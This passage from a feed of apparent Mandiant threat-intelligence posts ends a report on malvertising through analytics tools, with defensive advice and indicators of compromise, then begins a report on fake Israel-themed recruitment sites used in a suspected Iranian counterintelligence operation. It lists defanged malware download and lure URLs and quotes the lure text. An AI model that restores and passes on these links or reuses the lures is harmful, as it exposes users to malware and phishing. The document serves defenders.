src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig14a.max-1000x1000.png" alt="Landing page linked to ad, ktgotit[.]com"> </a> <figcaption class="article-image__caption "><p data-block-key="seg8j">Figure 14: Landing page linked to ad, ktgotit[.]com</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/weaponize-digital-analytics-tools-fig15a.max-1000x1000.png" alt="Recreated lure page shown only to connections that successfully pass the verification checks on ktgotit[.]com"> </a> <figcaption class="article-image__caption "><p data-block-key="wydvv">Figure 15: Recreated lure page shown only to connections that successfully pass the verification checks on ktgotit[.]com</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">In this scenario, the "Free Download" link in Figure 15 led to a download for a malicious archive file named “</span><span style="vertical-align: baseline;">Advanced_IP_Scanner_v.3.5.2.1.zip” (MD5: “5310d6b73d19592860e81e4e3a5459eb”) from the URL “hxxps://britanniaeat[.]com/wp-includes/Advanced_IP_Scanner_v.3.5.2.1.zip”.</span></p> <h3><span style="vertical-align: baseline;">Defending Against Advertising Attacks</span></h3> <p><span style="vertical-align: baseline;">Ad networks should aim to respond quickly to new abuse tactics. Once an abuse methodology is known by one threat actor, it will soon become known by many.</span></p> <p><span style="vertical-align: baseline;">For enterprises, an elegantly simple and proactive solution would be to </span><span style="vertical-align: baseline;">consider elevating your environment’s current default browser security settings for everyday browsing. Most modern browsers seek to optimize a balance between usability and security when it comes to automated protective measures enabled by default (such as in </span><a href="https://support.google.com/chrome/answer/9890866" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google SafeBrowsing</span></a><span style="vertical-align: baseline;">). For some enterprise environments these can be elevated past default levels without much noticeable impact to overall user experience.</span></p> <p><span style="vertical-align: baseline;">For individual users, when clicking on ads or links in ads, users should double-check the website address (URL) of the destination to make sure it matches the company or product in the ad and doesn’t contain typos. This is especially important on phones where the URL bar might be hidden. In the example shown in Figure 13, the URL for the ad was ”ktgotit[.]com” and the landing page content matched the domain shown in the ad (i.e., ktgotit). Yet, the content of the benign landing page showed dubiously formatted product details for loosely related products that all purported to be affiliated with different manufacturers, and the content of the malicious page (protected by cloaking mechanisms) did not have a domain that matched the one shown in the ad (Figure 13).</span></p> <p><span style="vertical-align: baseline;">Users are also encouraged to double-check URLs prior to downloading files from domains that were sponsored by web advertisements. </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/detecting-disrupting-malvertising-backdoors/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">As demonstrated in Mandiant's "Opening a Can of Whoop Ads: Detecting and Disrupting a Malvertising Campaign Distributing Backdoors,"</span></a><span style="vertical-align: baseline;"> users were led to believe the files they were downloading were affiliated with unclaimed funds from the “Treasury Department.”</span></p> <p><span style="vertical-align: baseline;">Google encourages users to report any ads they think may violate their policies or harm users so they can review and take action as needed. This article contains more guidance on </span><a href="https://support.google.com/google-ads/answer/7660847?hl=en" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">how to report ads</span></a><span style="vertical-align: baseline;">.</span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Indicators of Compromise</span></h3> <div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table style="width: 99.9641%;"><colgroup><col style="width: 36.8483%;"/><col style="width: 41.5524%;"/><col style="width: 21.6909%;"/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Filename</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">MD5</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Description</span></strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Advanced_IP_Scanner_v.3.5.2.1.zip</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">5310d6b73d19592860e81e4e3a5459eb</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Malicious archive file</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p> </p> </div> <div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">URL</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">IP Address</span></strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">Description</span></strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">hxxps://ktgotit[.]com</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">172.67.216[.]166</span></p> <p><span style="vertical-align: baseline;">(Cloudflare Netblock)</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Malvertising landing page</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">hxxps://aadvanced-ip-scanner[.]com</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">82.221.136[.]1</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Cloaked lure page</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">hxxps://britanniaeat[.]com/wp-includes<br/>/Advanced_IP_Scanner_v.3.5.2.1.zip</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">3.11.24[.]22</span></p> <p><span style="vertical-align: baseline;">(Amazon Netblock)</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Malware download URL</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Conclusion</span></h2> <p><span style="vertical-align: baseline;">In a digital world where every click leaves a trace, the line between data analytics tooling around marketing demographics and malware attack campaign optimization has become dangerously blurred to some degree. As the capabilities of legitimate tooling increases, so too will the capabilities of threat actors who choose to use them for nefarious purposes. However, as we have demonstrated through the practical examples shown throughout this blog post, by demonstrating how attackers use these tools and providing insights on ways defenders can proactively take steps to mitigate or eliminate their effects, mounting a viable and impactful defense against them is achievable.</span></p> <h2><span style="vertical-align: baseline;">Special Acknowledgments</span></h2> <p><span style="vertical-align: baseline;">Adrian McCabe would like to thank Joseph Flattery for his subject matter expertise on digital marketing tools.</span></p> <p><span style="vertical-align: baseline;">The authors would like to thank Mandiant Advanced Practices for their in-depth review of associated threat indicators.</span></p></div></description><pubDate>Thu, 29 Aug 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/how-attackers-weaponize-digital-analytics-tools/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>A Measure of Motive: How Attackers Weaponize Digital Analytics Tools</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/how-attackers-weaponize-digital-analytics-tools/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>I Spy With My Little Eye: Uncovering an Iranian Counterintelligence Operation</title><link>https://cloud.google.com/blog/topics/threat-intelligence/uncovering-iranian-counterintelligence-operation/</link><description><div class="block-paragraph_advanced"><p>Written by: Ofir Rozmann, Asli Koksal, Sarah Bock</p> <hr/></div> <div class="block-paragraph_advanced"><p style="text-align: left;"><span style="vertical-align: baseline;">Today Mandiant is releasing details of a suspected Iran-nexus counterintelligence operation aimed at collecting</span><span style="vertical-align: baseline;"> data on Iranians and domestic threats who may be collaborating with intelligence and security agencies abroad, particularly in Israel. </span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">The data collected by this campaign may support </span><span style="vertical-align: baseline;">the Iranian intelligence apparatus in pinpointing individuals who are interested in collaborating with Iran’s perceived adversarial countries. The collected data may be leveraged </span><span style="vertical-align: baseline;">to uncover human intelligence (HUMINT) operations conducted against Iran and to persecute any Iranians suspected to be involved in these operations. </span><span style="vertical-align: baseline;">These may include Iranian dissidents, activists, human rights advocates, and Farsi speakers living in and outside Iran.</span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">Mandiant assesses with high confidence this campaign was operated on behalf of Iran’s regime, based on its tactics, techniques, and procedures (TTPs), themes, and targeting. In addition, we observed a weak overlap between this campaign and </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations"><span style="text-decoration: underline; vertical-align: baseline;">APT42</span></a><span style="vertical-align: baseline;">, an Iran-nexus threat actor suspected to operate on behalf of Iran’s IRGC Intelligence Organization (IRGC-IO). This campaign’s activities are in line with Iran’s IRGC and APT42’s history of conducting surveillance operations against domestic threats and individuals of interest to the Iranian government. Despite the possible APT42 connection, Mandiant observed no relations between this activity and any U.S. elections-related targeting as previously </span><a href="https://blog.google/threat-analysis-group/iranian-backed-group-steps-up-phishing-campaigns-against-israel-us/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">reported</span></a><span style="vertical-align: baseline;"> by Google's Threat Analysis Group.</span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">The activity used multiple social media accounts to disseminate a network of over 35 fake recruiting websites containing extensive Farsi decoy content, including job offers and Israel-related lures, such as images of Israeli national symbols, hi-tech offices, and major city landmarks. Upon entry, the targeted users are required to enter their personal details as well as their professional and academic experience, which are subsequently sent to the attackers. </span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">The suspected counterintelligence operations started as early as 2017 and lasted at least until March 2024. In the past, similar campaigns were deployed in Arabic, targeting individuals affiliated with Syria and Hezbollah intelligence and security agencies. This may indicate Iran’s counterintelligence activities extend beyond its own security and intelligence apparatus, possibly in support of its allies in Syria and Lebanon. </span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">Mandiant worked to help ensure this activity was blocked and disrupted, the threat actor’s accounts were terminated, and </span><a href="https://safebrowsing.google.com/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Chrome users</span></a><span style="vertical-align: baseline;"> and the users of other browsers were protected.</span></p> <h2 style="text-align: left;"><span style="vertical-align: baseline;">Attack Lifecycle</span></h2> <p style="text-align: left;"><span style="vertical-align: baseline;">This activity leverages a network of fake recruitment websites posing as Israel-based human resources firms that use similar imagery in attempts to socially engineer Farsi-speaking individuals into providing personal details. The websites were disseminated online including through fake social media accounts, and used similar templates. The attack lifecycle is depicted in Figure 1.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig1.max-1000x1000.png" alt="Attack lifecycle"> </a> <figcaption class="article-image__caption "><p data-block-key="1s8zz">Figure 1: Attack lifecycle</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p style="text-align: left;"><span style="vertical-align: baseline;">The activity consists of several stages.</span></p> <h3 style="text-align: left;"><span style="vertical-align: baseline;">Step 1: Disseminate Links to Fake Recruitment Websites</span></h3> <p style="text-align: left;"><span style="vertical-align: baseline;">Mandiant identified multiple fake social media accounts promoting the websites on various social platforms, such as X (formerly Twitter) and Virasty, commonly used in Iran. </span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">The following X post contains a link to the malicious website, topwor4u[.]com, as well as the following description translated from Farsi:</span></p> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">“In the past year, we were able to attract hundreds of information and cyber professionals and achieve unique successes at the global level.</span></p> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">If you have information and cyber work experience, join us”.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig2.max-1000x1000.png" alt="Posts by @MiladAzadihr, a Twitter profile promoting the fake recruitment website topwor4u[.]com"> </a> <figcaption class="article-image__caption "><p data-block-key="ezgnc">Figure 2: Posts by @MiladAzadihr, a Twitter profile promoting the fake recruitment website topwor4u[.]com</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig3.max-1000x1000.png" alt="Post by @A_Soleimani_Far, a Virasty (Iranian social network) profile promoting the fake recruitment website joinoptimahr[.]com"> </a> <figcaption class="article-image__caption "><p data-block-key="2mkoc">Figure 3: Post by @A_Soleimani_Far, a Virasty (Iranian social network) profile promoting the fake recruitment website joinoptimahr[.]com</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3 style="text-align: left;"><span style="vertical-align: baseline;">Step 2: Fake Job Offer Websites Presenting Israel-Related Decoy Content</span></h3> <p style="text-align: left;"><span style="vertical-align: baseline;">Upon entering the website, the user is presented with the alleged purpose of the fake human resources firms: “[to] recruit employees and officers of Iran’s intelligence and security organizations.” </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation" style="text-align: left;"><span style="vertical-align: baseline;">The fake recruitment websites share templates and content, posing as HR firms, like “Optima HR” or “Kandovan HR.”</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline; text-align: left;"> <p role="presentation" style="text-align: left;"><span style="vertical-align: baseline;">The websites contain an elaborate description written in Farsi, presenting the alleged human resources firm as “active in the fields of international information and security/cyber consulting and research worldwide”. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation" style="text-align: left;"><span style="vertical-align: baseline;">The websites contain a Farsi description of the “Terms of Cooperation” with the fake HR firm:</span></p> </li> </ul> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">“Having relevant documented experience and resume in the field of information and cyber in related institutions and organizations (Mandatory).</span></p> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">Protecting your privacy is our priority.<br/></span><span style="font-style: italic; vertical-align: baseline;">Excellent salary for the chosen ones.</span></p> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">Our center invites you to contact us to submit a job offer and receive special and unique projects!!</span></p> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;"> Join us to help each other impact the world.<br/></span><span style="font-style: italic; vertical-align: baseline;">Our duty is to protect your privacy.”</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation" style="text-align: left;"><span style="vertical-align: baseline;">Mandiant observed both desktop and mobile versions of the websites beparas[.]com displaying similar contents and lures affiliated with Israel, including Israel’s flag and major city landmarks.</span></p> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--medium h-c-grid__col h-c-grid__col--4 h-c-grid__col--offset-4 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig4.max-1000x1000.png" alt="Mobile version of the fake website beparas[.]com, used between January and March 2024"> </a> <figcaption class="article-image__caption "><p data-block-key="vunsc">Figure 4: Mobile version of the fake website beparas[.]com, used between January and March 2024</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig5.max-1000x1000.png" alt="Desktop and mobile versions of the website beparas[.]com used in February 2024; the left web page also includes a form and a Telegram contact link"> </a> <figcaption class="article-image__caption "><p data-block-key="vunsc">Figure 5: Desktop and mobile versions of the website beparas[.]com used in February 2024; the left web page also includes a form and a Telegram contact link</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation" style="text-align: left;"><span style="vertical-align: baseline;">The websites contain Telegram contact links, using handles that contain “IL” (Israel) references, further enhancing the perceived Israel-affiliation of the campaign. For example:</span></p> </li> </ul> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">hxxps://t[.]me/Phantom</span><strong style="font-style: italic; vertical-align: baseline;">IL</strong><span style="font-style: italic; vertical-align: baseline;">13</span></p> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">hxxps://t[.]me/getDm</span><strong style="font-style: italic; vertical-align: baseline;">IL</strong><span style="font-style: italic; vertical-align: baseline;"> </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation" style="text-align: left;"><span style="vertical-align: baseline;">Several fake recruitment websites also contained a link to join a Telegram chat:</span></p> </li> </ul> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">hxxps://t[.]me/joinchat/AAAAAFgDeSXaWr2r_AQImw</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation" style="text-align: left;"><span style="vertical-align: baseline;">Further inspection of the domain beparas[.]com indicated the WordPress user data for the website is publicly available and lists the username “miladix” as well as </span><a href="https://support.gravatar.com/account/wordpress/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Gravatar</span></a><span style="vertical-align: baseline;"> URLs likely affiliated with this user (see the following screenshot). The value "b7e2f4a5bc67256189e6732fbce86520" in the Gravatar URLs is the Sha256 value of the user’s email, according to Gravatar </span><a href="https://docs.gravatar.com/general/hash/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">documentation</span></a><span style="vertical-align: baseline;">.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation" style="text-align: left;"><span style="vertical-align: baseline;">The nickname "Miladix" might be related to “Milad Azadi,” the name of the X account used by the campaign and previously mentioned. In addition, "Milad" is a Persian name, further strengthening the campaign’s affiliation to Iran. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation" style="text-align: left;"><span style="vertical-align: baseline;">Mandiant observed a domain miladix[.]com, affiliated with an Iranian software developer, although no links were found tying the campaign to miladix[.]com or its operator.</span></p> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig6.max-1000x1000.png" alt="Screenshot of the WordPress user&#x27;s URL of beparas[.]com"> </a> <figcaption class="article-image__caption "><p data-block-key="vunsc">Figure 6: Screenshot of the WordPress user's URL of beparas[.]com</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3 style="text-align: left;"><span style="vertical-align: baseline;">Step 3: Targeted User Fills Out Form, Personal and Professional details Sent to Attackers</span></h3> <p style="text-align: left;"><span style="vertical-align: baseline;">The fake recruitment websites contain a form that includes the fields: name, birth date, email, home address, education, and professional experience. </span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig7.max-1000x1000.png" alt="Fake personal details form"> </a> <figcaption class="article-image__caption "><p data-block-key="pcxos">Figure 7: Fake personal details form</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2 style="text-align: left;"><span style="vertical-align: baseline;">“Axis of Resistance”: Historic Operations Targeting Syria and Hezbollah</span></h2> <p style="text-align: left;"><span style="vertical-align: baseline;">Close inspection of the fake “Optima HR” websites revealed a previous network of fake recruitment websites that targeted Farsi speakers as well as Arabic speakers affiliated with Syria and Lebanon (Hezbollah) masquerading as a different HR firm named “VIP Human Solutions.”</span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">The “VIP Human Solutions” sites used very similar imagery and themes, purporting to recruit for security- and intelligence-related jobs using Israel-affiliated decoy content, as can be seen in the Figure 8.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig8.max-1000x1000.png" alt="Logos of VIP Human Solutions (2020–2023, left) and Optima HR (2022–2024, right)"> </a> <figcaption class="article-image__caption "><p data-block-key="pcxos">Figure 8: Logos of VIP Human Solutions (2020–2023, left) and Optima HR (2022–2024, right)</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig9.max-1000x1000.png" alt="dreamy-jobs[.]com, a fake “VIP Human Solutions” website used in 2022"> </a> <figcaption class="article-image__caption "><p data-block-key="pcxos">Figure 9: dreamy-jobs[.]com, a fake “VIP Human Solutions” website used in 2022</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p style="text-align: left;"><span style="vertical-align: baseline;">The “VIP Human Solutions” website’s contents, template, and personal details form are almost identical to the “Optima HR” website. The headline translates to:</span></p> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">“VIP job selection is a recruitment center for respected personnel and employees of Iran's security and intelligence organizations and institutions.”</span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">Mandiant observed significant overlaps between the historic “VIP Human Solutions” campaign and the ongoing “Optima HR” campaign, and considers both to be deployed by the same threat actor. The activity was mentioned publicly in the past and was suspected to be related to the Israeli Mossad.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--medium h-c-grid__col h-c-grid__col--4 h-c-grid__col--offset-4 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig10.max-1000x1000.png" alt="A Tweet from January 2021 mentioning “VIP Human Solutions”"> </a> <figcaption class="article-image__caption "><p data-block-key="pcxos">Figure 10: A Tweet from January 2021 mentioning “VIP Human Solutions”</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation" style="text-align: left;"><span style="vertical-align: baseline;">Mandiant observed the aforementioned Telegram group chat active, which has been active since at least 2021 and used by the two clusters:</span></p> </li> </ul> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">hxxps://t[.]me/joinchat/AAAAAFgDeSXaWr2r_AQImw</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation" style="text-align: left;"><span style="vertical-align: baseline;">The same link was embedded in multiple “VIP Human Solutions” websites, occasionally along with Israel (+972) phone numbers and additional Telegram accounts:</span></p> </li> </ul> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">hxxps://t[.]me/DreamyJobs_com<br/></span><span style="font-style: italic; vertical-align: baseline;">hxxps://t[.]me/wazayif_IL<br/></span><span style="font-style: italic; vertical-align: baseline;">“wazayif” is the English transcription of the word “jobs” in Arabic (وظايف)</span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">The “VIP Human Solutions” recruitment websites were likely in use from at least 2018 to at least 2023. In addition to Farsi websites, the cluster used Arabic websites with similar templates.</span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">Translation of the Arabic website’s title: </span></p> <p style="text-align: center;"><span style="font-style: italic; vertical-align: baseline;">“VIP Recruitment, a center for recruiting respected military personnel into the army, security services and intelligence from Syria and Hezbollah, Lebanon.”</span><span style="vertical-align: baseline;"> </span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig11.max-1000x1000.png" alt="wazayif-halima[.]com, an Arabic-language “VIP Human Solutions” website, used in 2021–2022 to target Syria and Hezbollah&#x27;s intelligence personnel"> </a> <figcaption class="article-image__caption "><p data-block-key="avzqd">Figure 11: wazayif-halima[.]com, an Arabic-language “VIP Human Solutions” website, used in 2021–2022 to target Syria and Hezbollah's intelligence personnel</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Mandiant also observed another version of the same website in 2023, which includes the “Loren Ipsum” dummy text in Arabic, possibly indicating that the updated version of the website was not operational yet. The template includes the Syrian flag and map, an Israeli phone number (+972), and a Telegram contact link: </span><span style="font-style: italic; vertical-align: baseline;">hxxps://t[.]me/DreamyJobs_com.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig12.max-1000x1000.png" alt="An updated version of wazayif-halima[.]com observed in July 2023"> </a> <figcaption class="article-image__caption "><p data-block-key="avzqd">Figure 12: An updated version of wazayif-halima[.]com observed in July 2023</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p style="text-align: left;"><span style="vertical-align: baseline;">While the “VIP Human Solutions” domains were registered beginning in 2020, Mandiant observed further historic evidence suggesting that the campaign has been active since at least 2018. </span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">Specifically, a YouTube channel named “VIP Human Solutions” was created by “Alireza Ebrahimpoor” in November 2018. The channel contains a single video by “VIP Jobs Global,” with a Farsi description very similar to the fake recruitment websites’, presented as a “recruitment center for retirees and employees of Iran’s security and intelligence organizations and institutions”. <span style="vertical-align: baseline;">The threat actor-controlled YouTube channel is no longer available.</span></span></p></div> <div 